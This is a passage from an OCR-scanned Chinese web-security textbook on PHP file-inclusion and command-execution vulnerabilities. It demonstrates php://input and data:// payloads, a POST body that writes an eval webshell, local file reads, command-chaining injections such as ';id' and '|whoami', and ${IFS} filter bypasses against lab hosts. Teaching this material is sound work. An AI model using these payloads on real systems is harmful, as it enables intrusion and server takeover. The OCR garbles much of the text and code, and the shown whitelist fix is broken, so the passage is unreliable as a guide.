在 payload 的 最 后 对 空格 进行 URL 编码 发现 空 格 可 以 绕 过 扩展 名 过 滤 。 


http://www.ctfs- wiki.com/FI/WFI.php? filename- http://192.168. 91. 133/F1/ 
php.txt$20 
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空格 绕 过 远程 文件 包含 效果 如 图 4-19 所 示 。 


http-//www.ctfs-wiki.com/FI/WFLphp?filename=http://192.168.91.133/FI/php-txt%20| 


口 Enable Post data [] Enable Referrer 


图 4-19 空格 绕 过 远程 文件 包含 效果 


49 PHP 伪 协 议 


PHP 带 有 很 多 内 置 URL 风格 的 封装 协议 ,可 用 于 fopen, copy, file_exists 和 filesize 
等 文件 系统 函数 。 除 了 这 些 内 置 封装 协议 ,还 能 通过 stream. wrapper register 注册 自 定 
义 的 封装 协议 。 这 些 协议 都 被 称 为 伪 协 议 。 
常见 的 PHP 伪 协 议 如 下 : 
file: // ,访问 本 地 文件 系统 。 
http; //, 访 问 HTTP(S) 网 址 。 
* ftp: //, 访 问 FTP(S) URL, 
* php: // ,访问 各 个 输入 输出 流 。 
。 zlib; //, 处 理 压 缩 流 。 
。 data: //, 读 取 数 据 。 
。 glob: // ,查找 匹配 的 文件 路 径 模式 。 
* phar; //,PHP 归档 。 
e ssh2: //,Secure Shell 2, 
* rar: // .RAR 数据 压缩 。 
* ogg: // ,处 理 音频 流 。 
° expect; // ,处 理 交互 式 的 流 。 
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4.9.1 php:// 伪 协议 


php :// 伪 协议 是 PHP 提供 的 一 些 输 入 输出 流 访问 功能 ,允许 访问 PHP. 的 输入 输出 
流 , 标 准 输入 输出 和 错误 描述 符 , 内 存 中 、 磁 盘 备 份 的 临时 文件 流 ,以 及 可 以 操作 其 他 读 取 
和 写 入 文件 资源 的 过 滤器 。 

1. php://filter 

php://filter 是 元 封装 器 ,设计 用 于 数据 流 打 开 时 的 筛选 过 滤 应 用 ,对 本 地 磁盘 文件 
进行 读 写 。 

以 下 两 种 用 法 相同 : 


?filename=php://filter/read=convert.base64-encode/resource=xxx.php 


?filename-php://filter/convert.base64-encode/resource-xxx.php 


利用 php: //filter 读 取 本 地 磁盘 文件 时 ,PHP 配置 文件 不 需要 开启 allow_url_fopen 


和 allow. url include, 
php: //filter 使 用 表 4-1 所 示 的 参数 作为 它 的 路 径 的 一 部 分 。 
表 4-1 php://filter 的 参数 
名 K d 述 
resource 一 二 要 过 滤 的 数据 流 之 | 该 参数 是 必需 的 。 指 定 要 过 滤 的 数据 流 
read 一 二 读 链 的 筛选 器 列表 之 “| 该 参数 可 选 。 可 以 设 定 一 个 或 多 个 筛选 器 名 称 ,以 管道 符 (|) 分 隔 
write 一 二 写 链 的 筛选 器 列表 之 “| 该 参数 可 选 。 可 以 设 定 一 个 或 多 个 筛选 器 名 称 ,以 管道 符 (|) 分 隔 


去 ;两 个 链 的 筛选 器 列表 二 未 read 一 或 write 一 作 前 绥 的 筛选 器 列表 会 视 情 况 应 用 于 读 或 写 链 
示例 代码 如 下 : 
«?php 
$filename-$ GET['filename']; include ($filename); 
>> 
输入 测试 数据 : 


http://www.ctfs- wiki.com/FI/FI.php? filename- php://filter/convert.base64 
-encode/resource-FI.php 


php: //filter 获取 FI. php 文件 的 Base64 编码 ,如 图 4-20 所 示 o 
2. php://input 
php: //input 可 以 访问 请 求 的 原始 数据 的 只 读 流 , 即 可 以 直接 读 取 POST. 上 没有 经 过 解 
析 的 原始 数据 ,但 是 使 用 enctype= "multipart/form-data" 的 时 候 php://input 是 无 效 的 。 
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Wi Load URL http//www.ctfs-wili.com/FI/Fl.php?filename zphp:/filter/read convert base64-encode/resource z FL.php: 
Split URL 
Split current URL 


L] Enable Post data  [ ] Enable Referrer 


PD9waHAKCgkkZmlsZWShbWUgIDOgJF9HRVRbJ2ZpbGVuYW1U107CglpbmNsdWRIKCRmaWxlbmFtZSk7Cj8 


图 4-20 ”获取 FI. php 文件 的 Base64 编码 


php://input 有 以 下 3 种 用 法 。 

1) 读 取 POST 数据 

php://input 可 以 直接 读 取 POST 上 没有 经 过 解析 的 原始 数据 。 

利用 php: //input 读 取 POST 数据 时 ,PHP 配置 文件 不 需要 开启 allow_url_fopen 
和 allow. url include, 


示例 代码 如 下 : 


«?php 


echo file get contents ("php://input"); 
?» 


上 面 的 代码 输出 file get contents 函数 获取 的 php://input 数据 。 测试 时 传人 
POST 数据 一 一 字符 串 test post. 最 终 输 出 该 字符 串 , 如 图 4-21 所 示 。 这 说 明 php:// 
input 可 以 获取 POST 传人 的 数据 。 


@ Load URL | httpV/www.ctfs-wikicom/FVPostphp 
Ü split URL 
®© Execute 
EZ Enable Post data [ ] Enable Referrer 
Post data test post 
test post 


4-21 php://input 获取 POST 传人 的 数据 
2) 写 人 木马 
利用 php: //input 写 人 木马 时 ,PHP 配置 文件 需要 开启 allow_url_include, 不 需要 开 
启 allow_url fopen。 
如 果 POST 传人 的 数据 是 PHP 代码 ,就 可 以 写 入 木马 。 
示例 代码 如 下 : 


«?php 
$filename-$ GET['filename']; 
include ($filename); 

T> 


如 果 POST 传人 的 数据 是 执行 写 和 人 木马 的 PHP 代码 ,就 会 在 当前 目录 下 写 和 一 个 
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木马 ,通过 POST 方法 传人 的 是 以 下 代码 : 


<? php fputs(fopen('shell.php','w'),'«?php @eval($ POST[cmd])?>');?> 


利用 php://input 传 人 的 写 人 木马 的 PHP 代码 如 图 4-22 所 示 。 


https/ /www.ctfs-wiki.com/FI/FI.php?filename=php://input 


回 Enable post data Enable Referrer 


<?PHP fputs(fopen('shell.php''w,'«?php Geval($ POST[cmd]?» 2» 


图 4-22 利用 php://input 传人 的 写 人 木马 的 PHP 代码 


测试 结果 是 通过 php: //input 执行 了 此 代码 ,并 在 当前 目录 下 写 人 了 shell. php, 如 


图 4-23 所 示 。 

1 KB PHP 文件 
15 PHP 文件 
1KP PHP 文件 


图 4-23 利用 php://input 写 入 木马 文件 
如 果 不 开启 allow_url_include, 就 会 产生 报错 ,无 法 利用 此 漏洞 ,如 图 4-24 所 示 。 


Kbr / 
[Kb>Warning</b>: include(php://input) [<a href=’ function. include’ function. include</aò]: failed to open 
jstream: operation failed in <bòC:\phpStudy\WWW\FI\FI. php</b> on line <bò4</b><br /> 


Kor /> 
|b»Warning^/b?: include() [<a href=' function. include' ^function. include</aò]: Failed openi: 
| php://input' for inclusion (include path-'.;C:Whp5Wear') in <bòC:\phpStudy\WWW\FI\FI. php</b> on 


lline <b>4¢/b><br / 


4-24 不 开启 allow_url_include 时 的 报错 信息 


3) 执行 命令 
利用 php://input 执行 命令 时 ,PHP 配置 文件 需 开 启 allow_url_include, 不 需要 开启 


allow_url_fopen. 


如 果 POST 传人 的 数据 是 PHP 代码 ,就 可 以 执行 任意 代码 ,如 果 此 PHP 代码 调用 


了 系统 函数 ,就 可 以 执行 命令 。 
示例 代码 如 下 : 
«?php 
$filename-$ GET['filename']; 
include ($filename); 
z= 
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通过 php: //input 执行 system 函数 ,输出 system 用 户 的 信息 ,如 图 4-25 所 示 。 


OST /FI/FI. php?filename=php://input HITP/1. 1 
Host: www.ctfs-wiki.com 

|ser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; 
[rv:56. 0) Gecko/20100101 Firefox/56.0 


HITP/1.1 200 OK 
: Sun, 17 Dec 2017 

:19 GMT 

Server: Apache/2.4.23 (Win32) 


Accept: OpenSSL/1. 0. 2j PHP/5. 2. 17 
text/html, application/xhtml-*xml, application/xml ;q=0. 9, * X-Powered-By: PHP/5. 2. 17 
|/*; q=0. 8 Content-Length: 21 


Accept-Language: zh-CN, zh; q=0. 8, en-US; q=0. 5, en; q=0. 3 
ccept-Encoding: gzip, deflate 

ontent-Type: application/x-www-form-urlencoded 
ontent-Length: 25 

-Forwarded-For: 127.0.0.1 

| keep-alive 

Ipgrade-Insecure-Requests: 1 


?php system(" whoami' ) ; ?>| 


Keep-Alive: timeout=5, max=100| 
Connection: Keep-Alive 
Content-Type: text/html 


nt authority\system 


图 4-25 php://input 执行 system 函数 的 结果 


如 果 不 开启 allow_url_include, 就 会 产生 报错 ,无 法 利用 此 漏洞 ,如 图 4-26 所 示 。 


[br /> 

kb>Warning</b>: include(php://input) [a href-' function. include’ >function. include</aò]: failed to open 
tream: operation failed in ¢bC:\phpStudy\WWW\FI\FI. php</b> on line <b>4¢/b>Cbr /> 

[br /> 

|b>Warning</b>: include() [<a href= function. include’ ^function. include</aò]: Failed opening 


php://input' for inclusion (include path-'.;C:Whp5Wear') in <b>C:\phpStudy\WWW\FI\FI. php</b> on 
ine 4b»44/b»br /> 


图 4-26 不 开启 allow_url_include 时 的 报错 信息 


4.9.2 ”file:// 伪 协议 


file:// 伪 协议 可 以 访问 本 地 文件 系统 , 读 取 文 件 的 内 容 。 
利用 file:// 时 ,PHP 配置 文件 不 需要 开启 allow_url_fopen 和 allow_url_include。 
file:// 伪 协议 示例 代码 如 下 : 
<?php 
$filename=$ GET['filename']; 


include ($filename); 
?» 


输入 以 下 URL: 


http://www.ctfs-wiki.com/FI/FI.php? filename-file://c:/boot.ini 


获取 c: /boot. ini 文件 的 内 容 ,如 图 4-27 所 示 。 


ET 
pm 


KS ee 


L Enable Post data. L erable Raterrar 


[boot loader] timeout=30 default=multi0)disk(0)rdiskr0)partition(1)NWINDOWS [operating systems] multi(Odisk(0)rdisk(O)partition() WINDOWS «"Windews Server 2003, Enterprise" /noexecute=optout 
/fastdetect. 


4-27 利用 file:// 获 取 c:/boot. ini 文 件 的 内 容 
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4.93 data:// 伪 协议 


从 PHP 5.2.0 起 ,数据 流 封装 器 开始 有 效 , 主 要 用 于 数据 流 的 读 取 。 如 果 传 入 的 数 
据 是 PHP 代码 ,就 会 执行 任意 代码 。 

使 用 方法 如 下 : 

data://text/plain;base64, X X X X X (Base64 编码 后 的 数据 ) 

利用 data:// 时 ,PHP 配置 文件 需 开 启 allow url include 和 allow_url_fopen. 

data:// 伪 协议 示例 代码 如 下 : 


<?php 
$filename=$ GET['filename']; 
include ($filename); 

T> 


通过 data:// 伪 协议 传送 二 ?php phpinfo();? 之 代码 的 Base64 编码 ,这 样 就 可 以 执行 
phpinfo 函数 。 二 ?php phpinfoO ;?— BJ Base64 编码 为 PD9waHAgcGhwaW5mbygpOz8 十 ， 
并 对 最 后 面 的 十 进行 URL 编码 (为 %2b)。 最 终 输入 的 data 数据 就 是 


data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8$ 2b 
输入 data 数据 : 


http://www.ctfs - wiki. com/FI/FI. php?filename = data://text/plain; base64, 
PD9waHAgcGhwaW5mbygpOz8$2b 


利用 data:// 执 行 了 phpinfo 函数 ,如 图 4-28 所 示 。 


|i) Load URL |http://www.ctfs-wiki.com/FI/Fl.php?filename=data://text/plain:base64.PD9waHAgcGhwaW5mbygpOz8%2b 
Ë SplitURL 
®© Execute 


[O Enable Post data [ ] Enable Referrer 


图 4-28 data:// 伪 协议 执行 phpinfo 函数 


4.94 ”phar:// 伪 协议 


phar:// 是 用 来 进行 解压 的 伪 协 议 ,phar:// 参 数 中 的 文件 不 管 是 什么 扩展 名 ,都 会 被 
HEERE. 
用 法 如 下 : 


?file=phar:// 压 缩 包 /内 部 文件 
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例如 : 


phar://xxx.png/shell.php 


利用 phar:// 时 ,PHP 的 版 本 应 高 于 5.3. 0, PHP 配置 文件 需 开 启 allow url. include 
和 allow_url_fopen. 
TEX. 压缩 包 需 要 用 zip:// 伪 协议 压缩 ,而 不 能 用 rar:// 伪 协议 压缩 。 将 木马 文件 
压缩 后 , 改 为 其 他 任意 格式 的 文件 都 可 以 正常 使 用 。 
示例 代码 如 下 : 
<?php 
$filename=$_GET['filename']; 


include ($filename); 
YE 


利用 步骤 : 通常 phar:// 伪 协议 用 在 有 上 传 功能 的 网 站 中 , 写 一 个 木马 文件 shell. 
php, 然 后 用 zip :// 伪 协议 压缩 为 shell. zip, 再 将 扩展 名 改 为 . png 等 ,上 传 到 网 站 。 
输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/FI/FI.php? filename-phar://shell.png/shell.php 
phar:// 会 把 shell. png 当 作 ZIP 压缩 包 来 解压 ,并 且 访 问 解压 后 的 shell. php 文件 ， 


这 样 就 可 以 通过 上 传 文件 的 功能 将 包含 shell. php 的 木马 文件 shell. png 上 传 到 网 站 , 然 
后 通过 phar:// 伪 协议 进行 漏洞 的 利用 ,如 图 4-29 所 示 。 


gore ctii conl hp?filename = phar//shellprg/helphp 


Fa Enable Post data []Enable Referrer 
[emd=phpintoD: 


图 4-29 ”phar:// 伪 协议 漏洞 利用 的 效果 
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4.9.5 ”zip:// 伪 协议 


zip:// 伪 协议 和 phar:// 伪 协议 在 原理 上 类 似 ,但 是 用 法 不 一 样 。 
用 法 如 下 : 
? file=zip://[ 压 缩 文件 绝对 路 径 ]# [压缩 文件 内 的 子 文件 名 ] 


例如 : 


Zip://xxx.png# shell.php 


利用 zip:// 时 ,PHP 的 版 本 应 高 于 5.3. 0,PHP 配置 文件 需 开 启 allow_url_include 
和 allow_url fopen。 

注意 ; # 在 浏览 器 中 要 转换 为 URL 编码 %23, 否 则 浏览 器 默认 不 会 传输 特殊 字符 。 

示例 代码 如 下 : 


<?php 
$filename=$ GET['filename']; 
include ($filename); 

2 > 


输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/FI/FI.php? filename-zip://shell.png$23shell.php 


zip:// 伪 协议 会 把 shell. png 当 作 ZIP 压缩 包 来 解压 ,并 且 访 问 解压 后 的 shell. php 
文件 ,这 样 就 可 以 通过 上 传 文件 的 功能 将 包含 shell. php 的 木马 文件 shell. png. 上 传 到 网 
站 ,然后 通过 zip:// 伪 协议 进行 漏洞 的 利用 ,如 图 4-30 所 示 。 


http://www.ctfs-wiki.com/FVFI.php?filename=zip://shellpng%23shel.pho 


[7] Enable Postdata [ ] Enable Referrer 
<md=phpinfo(r 


图 4-30 zip:// 伪 协议 漏洞 利用 的 效果 
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4.9.0 ”expect:// 伪 协议 


expect:// 伪 协议 主要 用 来 执行 系统 命令 ,但 是 需要 安装 扩展 。 
用 法 如 下 : 


?file=expect://1s 


410 ”文件 包含 漏洞 修复 


4.10.1 ”代码 层 修复 


在 修复 文件 包含 漏洞 时 ,可 以 在 代码 层 进行 文件 过 滤 , 将 包含 的 参数 设置 为 白 名 单 。 
例如 ,网 站 需要 包含 的 文件 只 有 index. php、home. php、admin. php 这 3 个 文件 ,就 可 以 将 
这 3 个 文件 的 名 称 定义 好 ,包含 的 文件 只 能 是 这 3 个 文件 中 的 一 个 ,示例 代码 如 下 : 


«?php 
$filename -$ GET['filename']; 
Switch ($filename) ( 
case 'index': 
case 'home': 
case 'admin': 
include '/var/www/html/' .$filename .'.php'; 
break; 
default: 
include '/var/www/html/' .$filename .'.php'; 


4.102 服务 器 安全 配置 


服务 器 安全 配置 主要 涉及 以 下 两 个 方面 : 


(D 修改 PHP 的 配置 文件 ,将 open_basedir 的 值 设 置 为 可 以 包含 的 特定 目录 ,后 面 
要 加 / Plh «open basedir— /var/www/html/, 


(2) 修改 PHP 的 配置 文件 ,关闭 allow_url_include, 可 以 防止 远程 文件 包含 。 


4.11 ”思考 题 


1. 什么 是 文件 包含 漏洞 ? 它 有 哪些 危害 ? 

2. 文件 包含 的 函数 有 哪 几 个 ? 它们 有 什么 区 别 ? 

3. 本 地 文件 包含 和 远程 文件 包含 的 区 别 有 哪 些 ? 
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- 有 限制 本 地 文件 包含 有 哪些 绕 过 方式 ? 
简 述 Session 文件 包含 的 原理 及 利用 条 件 。 
. 简 述 日 志文 件 包含 的 原理 及 利用 条 件 。 

. 有 限制 远程 文件 包含 的 绕 过 方式 有 哪些 ? 
.常见 的 PHP 伪 协 议 有 哪些 ? 

. php://input 有 哪些 利用 方式 ? 

10. 文件 包含 漏洞 有 哪些 修复 方式 ? 


O o0 站 中 oc e£ 
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5.1 命令 执行 漏洞 简介 


应 用 程序 的 某 些 功 能 需要 调用 可 以 执行 系统 命令 的 函数 ,如 果 这 些 函 数 或 者 函数 的 
参数 被 用 户 控 制 ,就 有 可 能 通过 命令 连接 符 将 恶意 命令 拼接 到 正常 的 函数 中 ,从 而 随意 执 
行 系统 命令 ,这 就 是 命令 执行 漏洞 。 它 属于 高 危 漏 洞 之 一 。 

下 面 介 绍 PHP 语言 常见 的 命令 执行 函数 和 运算 符 。 

1. system 函数 

system 函数 用 于 执行 外 部 程序 ,并 且 显 示 输出 。 其 用 法 如 下 : 


string system(string $command[, int &$return var]) 
例如 ,index. php 文件 的 内 容 为 二 ?php system Cwhoami0 ;?2,. BET Js y HH 
whoami 的 结果 如 下 : 


[root86da845537b27 html]#php index.php 
root 


2. exec 函数 
exec 函数 用 于 执行 一 个 外 部 程序 。 其 用 法 如 下 : 
string exec (string $command[, array &$output[, int &S$return var]]) 


例如 ,index. php 文件 的 内 容 为 二 ?php execCwhoami? ;27-.. BUE CBE AS i th s 
果 。 需 要 加 上 echo 函数 , 即 二 ?php echo execC whoami) ; ?2> , 才 会 输出 whoami 的 结果 root, 


[root@6da845537b27 html]#php index.php 
root 


3. shell exec 函数 
shell exec 函数 通过 shell 环境 执行 命令 ,并 且 将 完整 的 输出 以 字符 串 的 方式 返回 。 
其 用 法 如 下 : 


string shell exec(string $cmd) 
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例如 ,index. php 文件 的 内 容 为 二 ?php shell _execCwhoami);? 盖 。 执 行 该 代码 后 不 
会 输出 结果 。 需 要 加 上 echo 函数 , 即 二 ?php echo shell execCwhoami0 ; ? ,, 4 Zi iH 
whoami 的 结果 root。 


[root@6da845537b27 html]#php index.php 
root 


4. passthru 函数 
passthru 函数 用 于 执行 外 部 程序 并 且 显 示 原 始 输出 。 其 用 法 如 下 : 


void passthru(string $command[, int &$return var]) 


例如 ,index. php 文件 的 内 容 为 二 ?php passthru(C"whoamiD);? 之 。 执 行 该 代码 后 , 默 
认输 出 whoami 的 结果 root。 


[root@6da845537b27 html]#php index.php 
root 


5. popen 函数 
popen 函数 用 于 打开 进程 文件 指针 。 其 用 法 如 下 : 


resource popen (string $command, string $mode) 


例如 ,index. php 文件 的 内 容 为 二 ?php popen("touch test. txt", "r");?2>, WITZ 
代码 后 ,会 在 当前 文件 夹 下 创建 test. txt 文件 。 


[root@6da845537b27 html]#php index.php 
[root@6da845537b27 html]#1s 
index.php test.txt 


6. proc popen 函数 
proc popen 函数 用 于 执行 一 个 命令 ,并 且 打 开 用 来 输入 输出 的 文件 指针 。 其 用 法 
WF: 


resource proc_open (string $cmd, array $descriptorspec, array &$pipes [, string 


$cwd [, array $env [, array $other_options]]]) 
例如 ,index. php 文件 的 内 容 为 


«?php 
$proc-proc open ("whoami", 
array( 
array("pipe","r"), 
array("pipe","w"), 
array("pipe","w") 
DIE 
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$pipes); 
print stream get contents ($pipes[1]); 
mE 


执行 以 上 代码 后 ,输出 whoami 的 结果 如 下 : 


[root@6da845537b27 html]#php index.php 
root 


7. 反 单 引号 
反 单 引号 () 是 PHP 执行 运算 符 ,PHP 将 尝试 将 反 单 引号 中 的 内 容 作 为 shell 命令 来 


执行 ,并 将 其 输出 信息 返回 。 


例如 ,index. php 文件 的 内 容 为 二 ?php echo "whoami;? 之 。 执 行 该 代码 后 ,输出 


whoami 的 结果 root。 


[root@6da845537b27 html]#php index.php 
root 


5.2 Windows 下 的 命令 执行 漏洞 


5.2.1 Windows 下 的 命令 连接 符 
Windows 下 的 命令 连接 符 包 括 8-88. |、||。 


1. & 命令 连接 符 
S 前 面 的 语句 为 假 , 则 直接 执行 & 后 面 的 语句 ;& 前 面 的 语句 为 真 , 则 & 前 后 的 语 


句 都 执行 。 
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(1) & 前 面 的 语句 为 假 , 则 直接 执行 & 后 面 的 语句 。 
示例 如 下 : 


C:\Users\walk>test&whoami 


'test' 不 是 内 部 或 外 部 命令 ,也 不 是 可 运行 的 程序 或 批 处 理 文件 。 
desktop-h4ncnll\walk 


(2) & 前 面 的 语句 为 真 , 则 & 前 后 的 语句 都 执行 。 
示例 如 下 : 
C:\Users\walk>whoami gwhoami 


desktop-h4ncnll\walk 
desktop-h4ncnll\walk 
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2. && 命令 连接 符 

8 6. 前 面 的 语句 为 假 , 则 直接 报错 , && 后 面 的 语句 也 不 执行 ; && 前 面 的 语句 为 
真 , 则 8-8. 前 后 的 语句 都 执行 。 

(1) &&& 前 面 的 语句 为 假 , 则 直接 报错 , && 后 面 的 语句 也 不 执行 。 

示例 如 下 : 


C:NUsersWalk»test&&whoami 


'test' 不 是 内 部 或 外 部 命令 ,也 不 是 可 运行 的 程序 或 批 处 理 文件 。 


(2) && 前 面 的 语句 为 真 , 则 && 前 后 的 语句 都 执行 。 
示例 如 下 : 


C:\Users\walk>whoami&&whoami 
desktop-h4ncnll\walk 
desktop-h4ncnll\walk 


3. | 命令 连接 符 

| 前 面 的 语句 为 假 , 则 直接 报错 ,| 后 面 的 语句 也 不 执行 ; | 前 面 的 语句 为 真 , 则 执行 | 后 
面 的 语句 。 

CD. | 前 面 的 语句 为 假 , 则 直接 报错 ,| 后 面 的 语句 也 不 执行 。 

示例 如 下 : 


C:\Users\walk>test |whoami 


'test' 不 是 内 部 或 外 部 命令 ,也 不 是 可 运行 的 程序 或 批 处 理 文件 。 


(2) | 前 面 的 语句 为 真 , 则 执行 | 后 面 的 语句 。 
示例 如 下 : 


C:NUsers Walk»ipconfig |whoami 
desktop-h4ncnllWwalk 


4. || 命令 连接 符 

| | 前 面 的 语句 为 假 , 则 执行 | | 后 面 的 语句 ;| | 前 面 的 语句 为 真 , 则 只 执行 | | 前 面 的 语 
句 ,不 执行 | | 后 面 的 语句 。 

CD. | | 前 面 的 语句 为 假 , 则 执行 | | 后 面 的 语句 。 

示例 如 下 : 


C:NUsers Walk»test||whoami 
'test' 不 是 内 部 或 外 部 命令 ,也 不 是 可 运行 的 程序 或 批 处 理 文件 。 
desktop-h4ncnllWwalk 
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(2) | | 前面 的 语句 为 真 , 则 只 执行 | | 前 面 的 语句 ,不 执行 || 后 面 的 语句 。 
示例 如 下 : 


C:NUsersWalk»whoami||ipconfig 
desktop-h4ncnllWwalk 


5.222 Windows 下 的 命令 执行 漏洞 利用 
命令 执行 示例 代码 如 下 : 


<? php 
$ip-$ GET['ip']; 
system("ping ".$ip); 
?» 


代码 中 调用 了 system 函数 执行 ping 命令 ,正常 输入 ?ip 三 127. 0. 0. 1, 会 返回 ping 
127.0.0.1 的 结果 ,如 图 5-1 所 示 。 


Ë D | http://192.168.91.108/cms/exec/commandexec.php?ip=127.0.0.1 


Pinging 127.0.0.1 with 32 bytes of data: 


Reply from 127.0.0.1: bytes-32 time<lms TTL-128 
Reply from 127.0.0.1: bytes-32 time<lms TTL-128 


Reply from 127.0.0.1: bytes-32 time<lms TTL-128 


Reply from 127.0.0.1: bytes-32 timeClms TTL=128 
图 5-1 输入 ?ip==127.0.0.1 返 回 的 结果 
$ ip 是 可 控 参数 ,可 以 通过 Windows 下 的 命令 连接 符 执行 多 条 命令 , 达到 攻击 的 目 


的 。 输 入 ?ip 一 127. 0.0.1|whoami, 成 功 执行 ,返回 当前 用 户 的 信息 ,如 图 5-2 所 示 。 当 然 
也 可 以 执行 net user 等 其 他 关于 用 户 账户 管理 的 敏感 操作 。 


@ =, 
test-b9edf20207\administrator 


| * (€) © | 192.168.91.108/cms/exec/commandexec.php?ip-127.0.0.1|whoami 


图 5-2 #@ A7ip—127.0.0. 1| whoami iÉ [zl (f £& 8: 
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53 Linux 下 的 命令 执行 漏洞 


5.3.1 Linux 下 的 命令 连接 符 
Linux 下 的 命令 连接 符 包括 ;、&、&&、|、||。 


1. ;命令 连接 符 

;使 多 个 命令 顺序 执行 ,前 面 的 命令 和 后 面 的 命令 都 会 执行 。 

在 Linux 下 执行 id;id, 前 后 两 个 id 命令 都 执行 ,输出 当前 用 户 的 信息 。 
[root@6da845537b27 html]fid;id 


uid=0 (root) gid=0 (root) groups-0 (root) 
uid=0 (root) gid=0 (root) groups=0 (root) 


2. & 命令 连接 符 

& 的 作用 是 使 命令 在 后 台 运 行 , 这 样 就 可 以 同时 执行 多 条 命令 。 

在 Linux 下 执行 id& whoami ,前面 的 id 命令 和 后 面 的 whoami 命令 都 执行 ,输出 用 
户 信息 。 

[root@6da845537b27 html]#id&whoami 

[1] 453 


root 
[root86da845537b27 html]#uid=0 (root) gid-0 (root) groups-0 (root) 


3. && 命令 连接 符 

8.8. 的 作用 是 : 如 果 前 面 的 命令 执行 成 功 , 则 执行 后 面 的 命令 。 

在 Linux 下 执行 idd&&whoami, 前 面 的 idd 命令 不 存在 ,后 面 的 whoami 命令 没有 
执行 。 

[root@6da845537b27 html]#idd&&whoami 

bash: idd: command not found 


在 Linux 下 执行 id&&whoami, 前 面 的 id 命令 和 后 面 的 whoami 命令 都 执行 ,输出 
用 户 信息 。 
[root@6da845537b27 html]#id&&whoami 


uid=0 (root) gid=0 (root) groups-0 (root) 
root 


4. | 命令 连接 符 
| 的 作用 是 : 将 前 面 的 命令 的 输出 作为 后 面 的 命令 的 输入 ,前 面 的 命令 和 后 面 的 命令 
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都 会 执行 ,但 是 只 显示 后 面 的 命令 的 执行 结果 。 
在 Linux 下 执行 id| whoami ,前面 的 id 命令 和 后 面 的 whoami 命令 都 执行 ,输出 后 面 
的 whoami 命令 执行 后 的 用 户 信息 。 


[root@6da845537b27 html]#id|whoami 


root 


5.]| 命令 连接 符 

| | 的 作用 类 似 于 程序 中 的 if-else 语句 。 若 前 面 的 命令 执行 成 功 , 则 后 面 的 命令 就 不 
会 执行 ; 若 前 面 的 命令 执行 失败 , 则 执行 后 面 的 命令 。 

在 Linux 下 执行 idd| | whoami, 前 面 的 idd 命令 不 存在 ,后 面 的 whoami 命令 执行 后 
输出 用 户 信息 root。 


[root@6da845537b27 htm1]fidd||whoami 
bash: idd: command not found 


root 


5.82. Linux 下 的 命令 执行 漏洞 利用 
命令 执行 漏洞 示例 代码 如 下 : 


«?php 
$ip-$ GET['ip']; 
system("ping -c 3 ". $ip); 


pum 


代码 中 调用 了 system 函数 执行 ping 命令 ,输入 ?ip 王 127. 0.0. 1 ,会 返回 ping 127. 0. 0. 1 
的 结果 ,如 图 5-3 所 示 。 


€ © http//192.168.91.142:8080/index.php?ip=127.0.0.1 
p 

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 

64 bytes from 127.0.0.1: icmp seq-l ttl-64 time=0. 107 ms 


64 bytes from 127. 0. 0. mp seq-2 ttl-64 time-0.050 ms 
64 bytes from 127.0.0.1: icmp seq-3 ttl-64 time-0.052 ms 


— 127.0.0.1 ping statistics — 
3 packets transmitted, 3 received, 0% packet loss, time 2002ms 
rtt min/avg/max/mdev = 0. 050/0. 069/0. 107/0. 028 ms 


5-3 #@ A?ip=127. 0.0.1 的 返回 结果 


$ip 是 可 控 参 数 , 可 以 通过 Linux 下 的 命令 连接 符 执 行 多 条 命令 ,达到 攻击 的 目的 。 
如 图 5-4 所 示 ,输入 ?ip 二 127. 0.0. 1;id, 成 功 执行 ,返回 当前 用 户 的 信息 。 当 然 也 可 以 执 
行 其 他 Linux 命令 。 
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€ © view-source:http://192.168.91.142:8080/index.php?ip=127.0.0.1;id 
n 


PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 

64 bytes from 127.0.0.1: icmp seq-l ttl-64 time=0. 170 ms 
64 bytes from 127.0.0.1: icmp seq-2 ttl-64 time-0.052 ms 
64 bytes from 127.0.0.1: icmp seq-3 ttl-64 time-0. 050 ms 


— 127.0.0.1 ping statistics — 

3 packets transmitted, 3 received, 0% packet loss, time 2001ms 
rtt min/avg/max/mdev = 0. 050/0. 090/0. 170/0. 057 ms 
uid-500(testu) gid-500(testu) groups=500 (testu) 


图 5-4 #$@ A?ip=127.0. 0. 1;id 的 返回 结果 


54 命令 执行 绕 过 


开发 人 员 在 开发 的 过 程 中 ,为 了 避免 命令 执行 漏洞 ,可 能 会 过 滤 一 些 命令 或 者 比较 常 
见 的 攻击 payload。 攻 击 者 会 通过 多 种 方式 绕 过 过 滤 规 则 。 


544 绕 过 空格 过 滤 


1. $IFS} 绕 过 

$ IFS 是 shell 的 特殊 环境 变量 ,是 Linux 下 的 内 部 域 分 隔 符 。$IFS 中 存储 的 值 可 
以 是 空格 MRE ,换行 符 或 者 其 他 自 定义 符号 。 

空格 过 滤 可 以 用 $ {IFS}) 绕 过 。 例 如 : 


[rootef507700ble7d exec]#cat${IFS}commandexec.php 
«?php 

$ip-$ GET['ip']; 

system("ping -c 3 ".$ip); 
?> 


输入 以 下 测试 语句 : 


http://192.168. 91. 142/exec/commandexec. php? ip = 127. 0. 0. 1; cat ${ IFS } 
commandexec.php 


返回 commandexec. php 的 源码 内 容 , 如 图 5-5 所 示 。 


2. SIFS$9 绕 过 
空格 过 滤 可 以 用 $IFS$9 绕 过 。 例 如 : 


root@ubuntu:~#cat$IFS$9ctfs-wiki 
www.ctfs-wiki.com 


输入 以 下 测试 语句 : 
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| LoadURL  |http;//192.168.91.142/exec/commandexec.php?ip- 127.0.0.1:cat$(IFS)commandexec.php 
Ñ SsplituR. 
© Execute 


C Enable Post data [ ] Enable Referrer 


1 PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 

2 64 bytes from 127.0.0.1: icmp seq-l ttl-64 time-0.049 ms 

3 64 bytes from 127.0.0.1: icmp seq-2 ttl-64 time-0.053 ms 

4 64 bytes from 127.0.0.1: icmp seq-3 tt1=64 time-0.053 ms 

5 

6 — 127.0.0.1 ping statistics — 

7 3 packets transmitted, 3 received, 0% packet loss, time 2002ms 
8 rtt min/avg/max/mdev = 0.049/0. 051/0. 053/0. 008 ms 

9 <?php 

10 $ip = $ GET['ip']; 


12 system("ping ~c 3 ^. fip); 


图 5-5 $(IFS} 绕 过 的 返回 结果 


http://192. 168. 91. 142/exec/commandexec. php?ip = 127. 0. 0. 1; cat $IFS 
